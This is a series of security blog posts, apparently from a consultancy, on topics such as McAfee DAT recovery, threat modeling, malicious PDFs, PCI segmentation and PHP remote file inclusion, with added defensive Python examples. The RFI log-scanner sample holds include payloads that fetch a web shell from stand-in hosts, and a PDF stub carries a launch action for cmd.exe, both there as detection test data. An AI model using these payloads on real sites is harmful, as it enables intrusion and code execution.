McAfee Update Causing System Problems

McAfee’s anti-virus signature update for today (DAT 5958, April 21, 2010) is leaving systems stuck in an endless reboot loop. If your systems have not yet pulled this update, prevent them from doing so: disable automatic updates and cancel any pending update tasks.

The cause is a false positive. The new DAT misidentifies the legitimate Windows file C:\WINDOWS\system32\svchost.exe as the W32/Wecorl.a virus and quarantines it. Because svchost.exe hosts core Windows services, the machine then enters a reboot cycle. So far it appears that only Windows XP SP3 systems are affected.

McAfee has released a temporary EXTRA.DAT to suppress the false positive. To apply it with VirusScan Enterprise 8.5i or higher, Access Protection must first be disabled by following the McAfee knowledge base article linked here. (An alternate Google cache copy is linked here, since the McAfee site is very busy.)

To correct a machine with this issue, follow these steps:

1. Download the EXTRA.DAT file here (or from the KB article).
2. Start the affected machine in Safe Mode.
3. Copy the EXTRA.DAT file to the following location:
\Program Files\Common Files\McAfee\Engine
4. Restore svchost.exe from the quarantine, then reboot normally.

The 80/20 Rule of #Security: Threat Modeling

Threat modeling is a powerful technique that helps characterize high-level threats and break them down into more manageable sub-threats that can each be addressed. It can help an organization discover the core issue that lies beneath a high-level threat, such as a denial of service (DoS).

There are different approaches to threat modeling. One is to examine an existing application. The other is to evaluate threats at every stage of the software development lifecycle (SDLC). With our 80/20 Rule of Information Security project list, we work out which regulations apply to your company and assess the risks.

For instance, suppose a regulation requires strong access control measures to be in place. A high-level threat would be a malicious user escalating privileges. To do this, the user would need to bypass authentication or the authorization checks that sit behind it. With a Risk Management Threat Modeling Project, MSI would analyze the applications to find alternate entry points, harden them, and ensure that only authorized users have access.

What matters is discovering where threats exist and then developing security solutions to address them. MSI also examines data flow diagrams that chart the system: where data enters, which processes handle it, where it is stored, and which trust boundaries it crosses. Once we can see the data flows, we can start looking for vulnerabilities.

We use the STRIDE approach, which stands for Spoofing, Tampering, Repudiation, Information Disclosure, Denial of Service, and Elevation of Privilege. For each category, we carefully examine the loopholes that could leave your company’s data exposed. For instance, “spoofing” is pretending to be something you’re not. Many attackers send email notices that appear to come from a reputable source (like PayPal), but a quick look at the actual link address gives them away. These attacks now have a name: phishing.
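Here is what the data-flow-plus-STRIDE step looks like when written down, as an added example rather than any MSI tooling. It encodes the standard STRIDE-per-element table (which categories apply to an external entity, a process, a data store and a data flow), enumerates candidate threats for a small constructed diagram, and flags the flows that cross a trust boundary, since those are where spoofing and tampering controls usually have to be made explicit. The zone names and element names are hypothetical.

```python
"""STRIDE-per-element enumeration over a small data flow diagram (DFD).

Added example, not MSI's own tooling. The DFD at the bottom (a browser user,
a web application in a DMZ, and its database on the internal network) is
constructed for illustration; the zone names are hypothetical.
"""
from dataclasses import dataclass
from typing import Dict, List

STRIDE = {
    "S": "Spoofing",
    "T": "Tampering",
    "R": "Repudiation",
    "I": "Information Disclosure",
    "D": "Denial of Service",
    "E": "Elevation of Privilege",
}

# The classic STRIDE-per-element table: which categories apply to which kind
# of DFD element.  An external entity can be spoofed and can repudiate; a
# process is exposed to all six; a store and a flow cannot be "elevated".
APPLICABLE: Dict[str, str] = {
    "external": "SR",
    "process": "STRIDE",
    "store": "TRID",
    "flow": "TID",
}


@dataclass
class Element:
    name: str
    kind: str              # external | process | store | flow
    zone: str              # trust zone the element lives in (or starts in, for a flow)
    endpoints: tuple = ()  # flows only: (source name, destination name)


@dataclass
class Threat:
    element: str
    category: str
    crosses_boundary: bool

    def __str__(self) -> str:
        flag = " [crosses trust boundary]" if self.crosses_boundary else ""
        return f"{self.element}: {STRIDE[self.category]}{flag}"


def enumerate_threats(elements: List[Element]) -> List[Threat]:
    """One candidate threat per (element, applicable STRIDE category).

    Flows whose endpoints sit in different trust zones are flagged: those are
    the places where authentication, integrity and confidentiality controls
    have to be applied explicitly rather than assumed."""
    by_name = {e.name: e for e in elements}
    threats: List[Threat] = []
    for e in elements:
        crosses = False
        if e.kind == "flow":
            src, dst = (by_name[n] for n in e.endpoints)
            crosses = src.zone != dst.zone
        for cat in APPLICABLE[e.kind]:
            threats.append(Threat(e.name, cat, crosses))
    return threats


def boundary_threats(elements: List[Element]) -> List[Threat]:
    """Only the threats on flows that cross a trust boundary: review these first."""
    return [t for t in enumerate_threats(elements) if t.crosses_boundary]


# Constructed sample DFD for the login-and-order scenario.
SAMPLE_DFD = [
    Element("Browser user", "external", zone="internet"),
    Element("Web app", "process", zone="dmz"),
    Element("Orders DB", "store", zone="internal"),
    Element("login request", "flow", zone="internet",
            endpoints=("Browser user", "Web app")),
    Element("order query", "flow", zone="dmz",
            endpoints=("Web app", "Orders DB")),
]

if __name__ == "__main__":
    for t in enumerate_threats(SAMPLE_DFD):
        print(t)
```

The output is a checklist, not a finding: each line is a question ("can the login request be tampered with in transit?") that the review then answers with a control or an accepted risk. The boundary-crossing flows come first because a mistake there is usually the alternate entry point an attacker finds.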

No business wants a denial of service. This happens when an attacker floods your server with bogus requests until it can no longer serve legitimate users, or crashes outright. MSI’s HoneyPoint Security Server is one way to detect such activity early.

Tampering attacks can be directed against static data files or network packets. Most developers don’t think about tampering. When reading an XML configuration file, for example, do you check that it contains valid input? Would your program behave badly if that file contained malformed or unexpected data? These are the kinds of questions to ask when analyzing risk.
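To make the configuration-file question concrete, here is an added example (not code from the post) of reading an XML configuration defensively: reject anything that is not well-formed, require each expected setting exactly once, refuse unknown settings instead of ignoring them, and range-check values before they reach the rest of the program. The element names, bounds and sample documents are all hypothetical.

```python
"""Defensive parsing of an XML configuration file.

Added example, not code from the post. The settings, bounds and sample
documents are constructed; the element names are hypothetical.
"""
import xml.etree.ElementTree as ET


class ConfigError(ValueError):
    """Raised for any malformed or out-of-policy configuration."""


# Every valid config must contain exactly these settings.
REQUIRED = ("listen_port", "max_connections", "log_path")


def load_config(xml_text: str) -> dict:
    # 1. Refuse anything that is not well-formed XML, so a truncated or
    #    hand-edited file fails here instead of deep inside the application.
    try:
        root = ET.fromstring(xml_text)
    except ET.ParseError as exc:
        raise ConfigError(f"not well-formed: {exc}") from exc
    if root.tag != "service":
        raise ConfigError(f"unexpected root element <{root.tag}>")

    # 2. Every required setting must be present exactly once.
    cfg = {}
    for key in REQUIRED:
        nodes = root.findall(key)
        if len(nodes) != 1 or nodes[0].text is None:
            raise ConfigError(f"{key}: expected exactly one value")
        cfg[key] = nodes[0].text.strip()

    # 3. Unknown elements are rejected rather than silently ignored; a
    #    tampered file often adds settings the author never intended.
    extra = {c.tag for c in root} - set(REQUIRED)
    if extra:
        raise ConfigError(f"unknown settings: {sorted(extra)}")

    # 4. Type and range checks, so a bad value cannot become a bad bind()
    #    or an unbounded resource limit.
    try:
        cfg["listen_port"] = int(cfg["listen_port"])
        cfg["max_connections"] = int(cfg["max_connections"])
    except ValueError as exc:
        raise ConfigError(f"non-numeric value: {exc}") from exc
    if not 1 <= cfg["listen_port"] <= 65535:
        raise ConfigError("listen_port out of range")
    if not 1 <= cfg["max_connections"] <= 10000:
        raise ConfigError("max_connections out of range")
    if not cfg["log_path"].startswith("/var/log/"):
        raise ConfigError("log_path outside the allowed directory")
    return cfg


GOOD = """<service>
  <listen_port>8443</listen_port>
  <max_connections>200</max_connections>
  <log_path>/var/log/svc/app.log</log_path>
</service>"""

# Constructed tampered/malformed variants: truncated file, absurd limit,
# and a log path pointed at a file the service must never write.
BAD = [
    GOOD[:-12],
    GOOD.replace("200", "999999999"),
    GOOD.replace("/var/log/svc/app.log", "/etc/passwd"),
]


def check(xml_text: str):
    """Return the parsed config, or the ConfigError message if rejected."""
    try:
        return load_config(xml_text)
    except ConfigError as exc:
        return str(exc)


if __name__ == "__main__":
    print(check(GOOD))
    for doc in BAD:
        print("rejected:", check(doc))
```

If the file can come from an untrusted source, the parser’s entity handling matters as well (the defusedxml package exists for that); the checks above only cover the content the application itself acts on.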

MSI can help you achieve a more secure posture. Why not give us a call today?

Pain and Malicious PDFs

The ubiquitous PDF just seems to be everywhere. With all the recent attention on the variety of PDF exploits that have come to light over the last couple of weeks, many of our customers are asking how to defend against malicious PDF documents. The question is both simple and complex.

The simple answer, and of course the least realistic, is to disallow PDFs altogether. As you might already suspect, this is nearly impossible in any modern enterprise. A couple of recent polls in customer enterprises showed that even when staff members said they didn’t use PDFs in their day-to-day work, nearly all of them discovered that PDFs were an important part of some process once PDF documents started getting blocked at the perimeter. Not one of our client organizations has reported success with blanket blocking of PDF documents.

So, if we can’t block something that may be dangerous, we are back to the age-old game of defense in depth: we need more than one control protecting the organization against this attack vector. Nearly everyone runs antivirus on workstations and other systems, but in this case most antivirus products show little success in detecting the malicious PDFs themselves. The good news is that antivirus remains about as effective as usual at detecting the second stage of a malicious PDF attack, which usually involves the installation of malware. Some organizations have also started deploying PDF-specific heuristic scanning in their email scanners, web content scanners, firewalls and IDS/IPS systems, looking for features such as embedded JavaScript, actions that fire automatically when a document opens, and launch actions that are rarely legitimate in business documents. While each of these technical controls has its own strengths and weaknesses, meshed together they do a reasonable job of giving you detective, and perhaps preventive, capability against specific known PDF attack vectors.
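To show what that kind of PDF-specific heuristic check actually looks at, here is an added example (not an MSI product or anything from the post). It scans a document for the PDF name objects that exploit documents abuse, undoes the #xx hex escapes attackers use to hide those names from naive string matching, and inflates FlateDecode streams so names tucked inside compressed objects are also seen. The weights are a hypothetical triage score, and the sample documents are constructed stubs, not real malware.

```python
"""Heuristic triage of a PDF for the features malicious documents abuse.

Added example, not a product from the post. Scans raw bytes for risky PDF
names, normalises #xx name escapes, and inflates FlateDecode streams so
names inside compressed objects are seen. The sample documents at the
bottom are constructed stubs, not real malware.
"""
import re
import zlib

# Name objects that rarely appear in ordinary business documents but are
# common in exploit PDFs.  Weights are a rough, hypothetical triage score.
RISKY = {
    b"/JavaScript": 3, b"/JS": 3,           # script execution
    b"/OpenAction": 2, b"/AA": 2,           # actions fired automatically
    b"/Launch": 4,                          # run an external program
    b"/EmbeddedFile": 2, b"/RichMedia": 2,  # payload carriers
}
STREAM_RE = re.compile(rb"stream\r?\n(.*?)\r?\nendstream", re.S)
NAME_ESCAPE_RE = re.compile(rb"#([0-9A-Fa-f]{2})")


def normalise_names(data: bytes) -> bytes:
    """/J#61vaScript -> /JavaScript: undo hex escapes inside name objects."""
    return NAME_ESCAPE_RE.sub(lambda m: bytes([int(m.group(1), 16)]), data)


def inflate_streams(data: bytes) -> bytes:
    """Concatenate the decompressed content of every inflatable stream."""
    out = []
    for m in STREAM_RE.finditer(data):
        try:
            out.append(zlib.decompress(m.group(1)))
        except zlib.error:
            pass  # not Flate, or corrupt: the raw bytes are scanned anyway
    return b"".join(out)


def triage(pdf: bytes) -> dict:
    """Return {'score': n, name: count, ...} for the risky names found."""
    if not pdf.startswith(b"%PDF"):
        return {"score": 0, "note": "no PDF header"}
    haystack = normalise_names(pdf) + normalise_names(inflate_streams(pdf))
    hits = {}
    for name, weight in RISKY.items():
        # A name ends at the next delimiter or whitespace, so /JS must not
        # also match a longer name that merely starts with /JS.
        n = len(re.findall(re.escape(name) + rb"(?![A-Za-z0-9])", haystack))
        if n:
            hits[name.decode()] = n
    score = sum(RISKY[k.encode()] * v for k, v in hits.items())
    return {"score": score, **hits}


def _pdf(body: bytes) -> bytes:
    return b"%PDF-1.4\n" + body + b"\n%%EOF"


# Constructed: a plain document with no active content.
BENIGN = _pdf(b"1 0 obj << /Type /Catalog /Pages 2 0 R >> endobj")

# Constructed: JavaScript fired on open, with the name hex-escaped to dodge
# naive string matching.
ESCAPED = _pdf(b"1 0 obj << /Type /Catalog /OpenAction 2 0 R >> endobj\n"
               b"2 0 obj << /S /J#61vaScript /JS (app.alert(1)) >> endobj")

# Constructed: a launch action hidden inside a FlateDecode stream.
_inner = b"<< /S /Launch /F (cmd.exe) >>"
COMPRESSED = _pdf(b"3 0 obj << /Length 64 /Filter /FlateDecode >>\nstream\n"
                  + zlib.compress(_inner) + b"\nendstream\nendobj")

if __name__ == "__main__":
    for label, doc in (("benign", BENIGN), ("escaped", ESCAPED),
                       ("compressed", COMPRESSED)):
        print(label, triage(doc))
```

A score is a reason to sandbox or detonate the file, not a verdict: legitimate forms do use JavaScript, and a determined attacker can split names across indirect objects or use filters this scanner does not inflate. That is exactly why the post pairs these heuristics with antivirus on the second stage and with user awareness.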

Obviously, you want to back up these technical controls with user training, education and awareness. Users need to understand that a PDF can be as dangerous as, if not more dangerous than, many other common attachment types. Many of the users we have talked to in the last few weeks were surprised that a PDF could execute code on their machine or otherwise be harmful; it seems many users trust PDF documents far more than they should. Given how many of the new PDF exploits work, make your users aware that they should pay careful attention to any pop-up message from the PDF reader and, if they are unsure about it, seek assistance before accepting it or clicking OK/Continue.

Lastly, PDF attacks like the ones currently in circulation continue to show the importance of many of the projects in our 80/20 Rule of Information Security. By leveraging projects such as anomaly detection and enclave computing, organizations can not only reduce the damage a successful client-side attack can do, but also give themselves a leg up on identifying such attacks, blocking their sources and quarantining their victims. If you would like to discuss some of these approaches, please drop me a line or give us a call.

What approaches to PDF security has your organization found to be effective? If you have a winning strategy or tactic, leave us a comment below. As always, thanks for reading and be careful out there.

MicroSolved, Inc. Announces the Immediate Release of NED Alpha

That’s right! No longer do you have to spend days and nights worrying about the state of your network. No more fretting about your partners, security or other traditional concerns.

Today is the dawn of a new day for network engineers around the globe!

Want to know how your network is? ASK YOUR PACKETS!!!!!

MicroSolved’s revolutionary new product, code-named NED (Network Emotion Detector), will continually update you on the emotional health of your packets. If there’s a network problem, a security breach or if you happen to fall out of compliance with the Pennsylvania Concrete Institute’s (PCI) standards, your NED will immediately alert your team to the lack of happiness being experienced by your packets as they traverse the various public and private networks!

[Screenshot: the NED interface]

Even more powerful than the executive dashboard, the GUI can be operated near the data center hallway window, so passing executives can quickly identify the happiness quotient (TM) of your network. When they see NED smiling, they will know you are doing your job well. When NED is unhappy and your packets begin to show signs of sadness, they can quickly and easily purchase additional “emotional credits” through the handy interface. These emotional credits (ie: money) make your packets happy and joyous as they traverse the Intertubes.

If that were all NED did, it would still be the most powerful network emotional monitoring tool on the market, but we even take it one step further! Using NED’s soon to be copylefted capabilities, we create emotional tunnels for your packets to move back and forth with your peers. These “Virtual Private Hugs” (VPH) allow you and your business partners to mutually enjoy all the power of NED and emotional credits together. You can easily monitor the happiness of your partner’s packets and those that show emotional disparity, making VPH even more important for those folks. Lastly, NED features a peer-to-peer network monitoring mechanism that allows you to closely monitor the overall happiness level around the Cloud. That’s right, MSI is the first in the world to create Happiness as a Service (HaaS)(TM)!

Act now and you can get your own copy of NED for Windows FREE for a limited time. Download from here and start enjoying the ease and joy of NED from MSI. We hope you enjoy NED, “because packets need love too…”

Happy April Fools’ Day from your security partners at MicroSolved, Inc. We hope it made you smile. BTW – the download really runs. Windows only, for now…. :p

Mind Map Your Way to Information Security

In order to know what your organization needs for security, you first need to define what you have. Often this task of defining and organizing is intimidating, especially if it has been a long time since anyone did it. With a mind mapping tool such as Inspiration, or the free tool XMind, pulling together an inventory of your assets comes together quickly.

It is important to define the “Who, What, Where” when assessing your environment. Who has access? What programs are running, and on which machines? Where does the data reside that could be compromised? And how is the environment secured?

Creating a map lets you follow relationships easily, so you can assign tasks accordingly. It also makes visible relationships that previously went unseen or unnoticed.

As the various network relationships are mapped out, it will be easier to see what would be affected in your enterprise should a data breach occur.

If Server A is compromised, incident responders can quickly assess which other components may have been affected by reviewing its trust relationships. A clear depiction of component dependencies also eases re-architecture, allowing faster, more efficient upgrades. Creating a physical map alongside the data flow and trust relationships ensures that components are not forgotten.
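Once the trust relationships are written down, the "Server A is compromised, what else is exposed?" question becomes a graph walk. The following is an added example (not from the post) over a constructed map of hosts: an edge from A to B means B trusts A in some way (shared credentials, a service account, a mounted share, or plain network reachability), so a compromise of A can spread to B. The host names are hypothetical.

```python
"""Blast-radius lookup over a mapped set of trust relationships.

Added example, not from the post. The hosts and edges below are a
constructed map of the kind a mind-mapping exercise produces: an edge
A -> B means B trusts A (credentials, shares, service accounts, or network
reachability that A could use to reach B)."""
from collections import deque

# Constructed sample: who can reach or authenticate to whom.
TRUSTS = {
    "Server A (web)": ["DB-1", "FileShare"],
    "DB-1":           ["Backup"],
    "FileShare":      ["Workstation-7", "Workstation-9"],
    "Workstation-7":  ["DB-1"],
    "Workstation-9":  [],
    "Backup":         [],
    "HR-App":         ["DB-1"],   # trusts nothing reachable from Server A
}


def blast_radius(compromised: str, trusts: dict) -> dict:
    """Breadth-first walk from a compromised host.

    Returns {host: hops} for every host reachable through the trust map, so
    responders can prioritise the nearest systems first."""
    depth = {compromised: 0}
    queue = deque([compromised])
    while queue:
        cur = queue.popleft()
        for nxt in trusts.get(cur, []):
            if nxt not in depth:
                depth[nxt] = depth[cur] + 1
                queue.append(nxt)
    return depth


def reverse(trusts: dict) -> dict:
    """Invert the map, so edges point from a victim back to its possible sources."""
    rev = {h: [] for h in trusts}
    for src, dsts in trusts.items():
        for d in dsts:
            rev.setdefault(d, []).append(src)
    return rev


def upstream(victim: str, trusts: dict) -> dict:
    """Hosts from which `victim` could have been reached (root-cause work)."""
    return blast_radius(victim, reverse(trusts))


if __name__ == "__main__":
    reach = blast_radius("Server A (web)", TRUSTS)
    for host, hops in sorted(reach.items(), key=lambda kv: kv[1]):
        print(f"{hops} hop(s): {host}")
    print("could have led to DB-1:", sorted(upstream("DB-1", TRUSTS)))
```

The same map answers both incident-response questions: the forward walk gives containment scope, and the reverse walk gives the candidate sources when a host is found compromised without a known entry point. Keeping the map current is the hard part, which is why the post ties it to the asset inventory rather than to the incident.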

Finally, categorizing system functions eases the enclaving process. So mind map your way to security and reach your destination of a safer enterprise.

PCI Scope Reduction — Why not?

Bill Mathews, our Guest Blogger, is co-founder and CTO of Hurricane Labs (www.hurricanelabs.com), an information security services firm.

Limiting your PCI compliance scope can be beneficial in several ways. First, it minimizes the number of assets to which PCI applies, but more importantly it limits the number of places you can find credit card data on your network. The latter is the most important. PCI isn’t some huge, scary thing you should run away from, and scope reduction won’t solve all your problems, but it can get you to a point where you understand what is really happening on your network. There are a few caveats and “gotchas” you will encounter along the way, but the journey is worth it.

In order to reduce your PCI scope you must first classify your assets. This is much harder than it sounds for most organizations. You have to figure out what data goes where and how it flows. This mapping is crucial for proper scope reduction. This type of awareness not only helps you reduce your PCI scope but also helps with general troubleshooting. Ultimately it will improve your process; it’s a win-win. If you don’t know where the data is, the bad guys will help you find it.

After you’ve happily mapped out your data flow and understand where things are and why, you can move on to segmentation. Segmentation essentially lets you split your network into smaller chunks, which makes our next goal much easier to implement: the principle of least privilege, which essentially says, “if you don’t need access, you don’t get access.” I’ve often argued that proper implementation of least privilege will not only solve nearly all your compliance issues but goes a long way toward solving your security woes as well. Notice I said “proper implementation.” Many implementations of it are flawed. Following up segmentation with a good access control test is very important: it’s one thing to have controls, and quite another to have them properly implemented.
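What an access control test of a segmented network boils down to, as an added example rather than anything from Hurricane Labs or MSI: declare which segments exist, write the least-privilege rule for traffic entering the cardholder data environment as an explicit allow list, then feed in what was actually observed (a firewall rule export, or the results of probing each CDE host from a machine in every other segment) and report anything that got in without being on the list. The zones, policy and observed connections below are constructed.

```python
"""Checking segmentation against a least-privilege policy.

Added example, not Hurricane Labs' or MSI's tooling. Zone membership, the
allowed-flow policy, and the "observed" connections are all constructed;
in practice the observed list comes from a firewall rule export or from an
access-control test run from each segment."""
import ipaddress
from typing import Dict, List, Tuple

# Which segments exist and what address space each one owns.
ZONES = {
    "cde":   ipaddress.ip_network("10.10.0.0/24"),     # cardholder data environment
    "corp":  ipaddress.ip_network("10.20.0.0/16"),
    "guest": ipaddress.ip_network("192.168.50.0/24"),
    "mgmt":  ipaddress.ip_network("10.99.0.0/24"),
}

# Least privilege: every flow *into* the CDE must be on this list.
# Entries are (source zone, "port/proto").
ALLOWED_INTO_CDE = {
    ("corp", "443/tcp"),   # POS terminals to the payment application
    ("mgmt", "22/tcp"),    # admin jump host only
}

Flow = Tuple[str, str, str]   # (src_ip, dst_ip, "port/proto")


def zone_of(ip: str) -> str:
    addr = ipaddress.ip_address(ip)
    for name, net in ZONES.items():
        if addr in net:
            return name
    return "unknown"


def check_flows(observed: List[Flow]) -> Dict[str, List[Flow]]:
    """Classify observed flows that reach the CDE.

    A flow is a violation if it enters the CDE and is not explicitly
    allowed.  Flows that never touch the CDE are out of scope and ignored;
    an unmapped source address is treated as untrusted, not as exempt."""
    result: Dict[str, List[Flow]] = {"ok": [], "violation": []}
    for src, dst, svc in observed:
        if zone_of(dst) != "cde":
            continue
        src_zone = zone_of(src)
        if src_zone == "cde":
            continue   # intra-CDE traffic is governed by host-level controls
        verdict = "ok" if (src_zone, svc) in ALLOWED_INTO_CDE else "violation"
        result[verdict].append((src, dst, svc))
    return result


# Constructed "observed" connections, as produced by an access-control test
# in which a probe in each segment tried to reach a CDE host.
OBSERVED: List[Flow] = [
    ("10.20.4.15",    "10.10.0.5", "443/tcp"),   # corp POS -> payment app: allowed
    ("10.99.0.2",     "10.10.0.5", "22/tcp"),    # jump host SSH: allowed
    ("10.20.4.15",    "10.10.0.5", "3389/tcp"),  # corp RDP into CDE: violation
    ("192.168.50.77", "10.10.0.5", "443/tcp"),   # guest wifi into CDE: violation
    ("172.16.9.9",    "10.10.0.5", "445/tcp"),   # unmapped source: violation
    ("10.20.4.15",    "10.20.1.1", "53/udp"),    # never touches CDE: ignored
]

if __name__ == "__main__":
    for verdict, flows in check_flows(OBSERVED).items():
        for src, dst, svc in flows:
            print(f"{verdict:9} {src} -> {dst} {svc}")
```

The third finding is the usual surprise in these tests: a rule that was correct for the payment application also happens to pass RDP, because the firewall rule was written by network rather than by service. That is the gap between "having controls" and having them properly implemented.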

By no means are these the only things you should do; but in my opinion they are crucial for reducing your risk. Accomplish these few things and you’ll be well on your way to both reducing your PCI scope and having a well-balanced security posture on your network. Overall it is worth the effort it takes.


Updated PHP RFI Slides with Code Examples

Thanks to the folks who joined us for this afternoon’s PHP security talk about modern RFI (remote file inclusion) attacks, how they work and what attackers are up to. If you are interested in the new slide deck, you can find it here: http://bit.ly/bT2TF7

If you would like to attend a virtual presentation or book one of our engineers to give the talk to your development team (either virtually or face to face), drop me a line and let me know. The talk is strong and lends itself well to understanding how PHP RFI has become one of the most common attack vectors used to spread malware, bots and other illicit activity.
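For readers who cannot make the talk, here is the shape of an RFI attempt as it shows up in a web server log, with an added detection script (not material from the slides). An RFI payload is a query parameter whose value is a URL or a PHP stream wrapper, handed to an unsanitised include(); the script parses Apache combined-format lines, undoes the stacked URL encoding attackers use, and flags parameters whose value starts with a remote scheme. The log lines are constructed and use documentation address ranges.

```python
"""Spotting PHP remote file inclusion (RFI) attempts in web server logs.

Added example, not material from the talk. The log lines are constructed in
Apache combined format; detection looks at query parameters whose values
are a URL or a PHP stream wrapper, which is what an RFI payload looks like
when it abuses an unsanitised include($_GET['page'])."""
import re
from urllib.parse import parse_qsl, unquote, urlsplit

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) \S+" '
    r'(?P<status>\d{3}) \S+'
)
# Schemes and wrappers that turn include() into code execution from elsewhere.
# Anchored at the start of the value: a search term that merely contains a
# URL is not an include attempt.
REMOTE_RE = re.compile(r"^(https?|ftps?)://|^(php|data|expect|phar):", re.I)


def decode(value: str) -> str:
    """Undo up to two extra layers of URL encoding, which attackers stack."""
    for _ in range(2):
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
    return value


def rfi_params(request_path: str):
    """Return [(param, value)] for parameters that look like remote includes."""
    query = urlsplit(request_path).query
    hits = []
    for key, raw in parse_qsl(query, keep_blank_values=True):
        val = decode(raw)            # parse_qsl already removed one layer
        if REMOTE_RE.search(val.lstrip()):
            hits.append((key, val))
    return hits


def scan_log(lines):
    """Return (client_ip, param, value) for every RFI-looking request."""
    findings = []
    for line in lines:
        m = LOG_RE.match(line)
        if not m:
            continue
        for param, val in rfi_params(m.group("path")):
            findings.append((m.group("ip"), param, val))
    return findings


# Constructed log lines: one benign include, a classic RFI with the trailing
# "?" that neutralises whatever the script appends, two encoded variants
# (single and double percent-encoding), a data: wrapper, and a false-positive
# candidate where a URL appears inside a search query.
SAMPLE_LOG = [
    '203.0.113.9 - - [21/Apr/2010:10:02:11 -0400] "GET /index.php?page=about HTTP/1.1" 200 5120',
    '203.0.113.9 - - [21/Apr/2010:10:02:14 -0400] "GET /index.php?page=http://198.51.100.7/r57.txt? HTTP/1.1" 200 8921',
    '198.51.100.23 - - [21/Apr/2010:10:05:40 -0400] "GET /view.php?tpl=%68%74%74%70%3a%2f%2f198.51.100.7/c.txt HTTP/1.1" 500 310',
    '198.51.100.23 - - [21/Apr/2010:10:05:41 -0400] "GET /view.php?tpl=%2568%2574%2574%2570%253a%252f%252fevil.example/x HTTP/1.1" 200 77',
    '192.0.2.44 - - [21/Apr/2010:10:07:02 -0400] "GET /index.php?page=data:text/plain,%3C%3Fphp%20phpinfo()%3B HTTP/1.1" 200 4001',
    '192.0.2.8 - - [21/Apr/2010:10:08:00 -0400] "GET /docs/?q=see+http://example.org HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for ip, param, val in scan_log(SAMPLE_LOG):
        print(f"{ip}  {param}={val}")
```

A 200 on one of these lines is the worrying case: the include succeeded, or at least the page did not error out. On the application side the fix is not to sanitise the URL but to never hand user input to include() at all, mapping the parameter to a fixed allow-list of local files instead.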

MSI Says: Know Yourself – Unlock a DoS by Asking: Who Has Access?

Recently, a client experienced some interesting issues during a scheduled assessment of their internal networks around the world. It appeared that the assessment was causing a denial of service at one specific location, due to automation controllers in their environment. That was an interesting anomaly, because the same controllers are deployed at other locations, yet only this one had problems. The DoS was even more interesting from our perspective because it was literally locking the doors to the facility in question! We weren’t testing for this vulnerability; it turned up as a side effect of an internal assessment we completed to provide metrics and action plans according to our 80/20 guidelines. These are exactly the type of issues that help our clients understand the value of ongoing assessments.

So what’s the big deal? Let’s say an employee just got nagged about taking three 15-minute smoke breaks every hour. Let’s also say he knows the environment and/or has experience with a vulnerability scanner. He could lock the facility down while searching for ways to retaliate, and his employer wouldn’t even know it. Worse yet, anyone who knows the flaw exists could exploit it at will with a few keystrokes from their workstation. Not a good thing!

Controllers and sensors of this type are used in businesses around the globe. This case study makes another argument for enclaving in any environment: the overall threat could have been reduced significantly simply by segregating this traffic, since there are few reasons these hosts should be reachable from most workstations. Until that is done, fragile embedded devices of this kind should also be scanned only with conservative settings, or excluded from automated scanning and assessed by hand. Fortunately, the issue didn’t last long. After some communication with the manufacturer, a firmware update was released that appears to have resolved it.

So the bottom line is: know your environment. It is the foundation of our 80/20 Rule for Security and lays the groundwork for discovering where vulnerabilities may lurk. Forewarned is forearmed.

Another Close Up with Anti-Virus Tools

In the last few days, the folks who make Sub7, a common and well-known Windows back door/remote access tool, released a new version. You can find more about its capabilities here.

Since I have been doing a bit of research lately that has included anti-virus products and their often abysmal detection rates, I decided to test this new version of Sub7 against the VirusTotal scanning base. You can find the results here.

As you can see, the detection rate for this “remote access tool” is just under 55%. This time, all three of the major enterprise vendor products catch its malicious nature, but the most common free tool, AVG, misses it entirely. As such, organizations are likely protected, but a great many home-user and consumer machines will be unable to detect the installation of this very common attacker tool.

As with many of my past posts on this topic, I point this out simply to help people understand the true level of protection that AV offers. Many see it as a panacea, but clearly it is not. AV is a necessary part of defense in depth, but additional controls and security tools are required to build effective detection for malware infections.